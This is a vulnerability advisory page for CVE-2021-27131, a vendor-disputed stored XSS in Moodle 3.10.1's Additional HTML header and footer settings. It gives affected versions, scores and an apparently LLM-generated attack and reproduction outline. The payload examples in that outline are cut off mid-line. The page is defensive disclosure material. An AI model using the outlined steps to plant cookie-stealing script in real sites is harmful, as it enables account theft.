Moderate severityNVD Advisory· Published May 16, 2023· Updated Aug 3, 2024

CVE-2021-27131

Description

Moodle 3.10.1 is vulnerable to persistent/stored cross-site scripting (XSS) due to the improper input sanitization on the "Additional HTML Section" via "Header and Footer" parameter in /admin/settings.php. This vulnerability is leading an attacker to steal admin and all user account cookies by storing the malicious XSS payload in Header and Footer. NOTE: this is disputed by the vendor because the "Additional HTML Section" for "Header and Footer" can only be supplied by an administrator, who is intentionally allowed to enter unsanitized input (e.g., site-specific JavaScript).

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package	Affected versions	Patched versions
moodle/moodlePackagist	<= 3.10.1	—

Affected products

Moodle/Moodlecpe-rescue
osv-coords2 versions
pkg:bitnami/moodle pkg:composer/moodle/moodle
>= 3.10.1, < 3.10.2+ 1 more
- (no CPE)range: >= 3.10.1, < 3.10.2
- (no CPE)range: <= 3.10.1

Patches

Vulnerability mechanics

Root cause

"Improper input sanitization on the "Header" and "Footer" fields in the Additional HTML Section allows stored XSS."

Attack vector

An attacker who already possesses administrator credentials navigates to Site Administration > Appearance > Additional HTML and injects a JavaScript payload (e.g., `

Affected code

The vulnerability exists in the "Additional HTML Section" of `/admin/settings.php`, specifically the "Header" and "Footer" parameters [ref_id=1]. The code path does not sanitize or neutralize user-controllable input before it is rendered on every page of the application.

What the fix does

No patch is provided in the bundle. The vendor disputes the finding, arguing that the "Additional HTML Section" is intentionally designed to allow administrators to enter unsanitized input such as site-specific JavaScript [ref_id=1]. No remediation guidance is published by the vendor.

Preconditions

authAttacker must have administrator-level credentials for the Moodle instance
configThe Moodle version must be 3.10.1

Reproduction

1. Log in to the Moodle instance with administrator credentials. 2. Navigate to Site Administration > Appearance > Additional HTML. 3. Insert `

Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

github.com/advisories/GHSA-w2pm-fr62-jgv4ghsaADVISORY
nvd.nist.gov/vuln/detail/CVE-2021-27131ghsaADVISORY
docs.moodle.org/402/en/RisksghsaWEB
github.com/p4nk4jv/CVEs-Assigned/blob/master/Moodle-3.10.1-CVE-2021-27131.mdghsaWEB

News mentions

No linked articles in our index yet.

cvss	0.260
epss	0.001
exploit	0.000
kev	0.000
patch	0.000
ransomware	0.000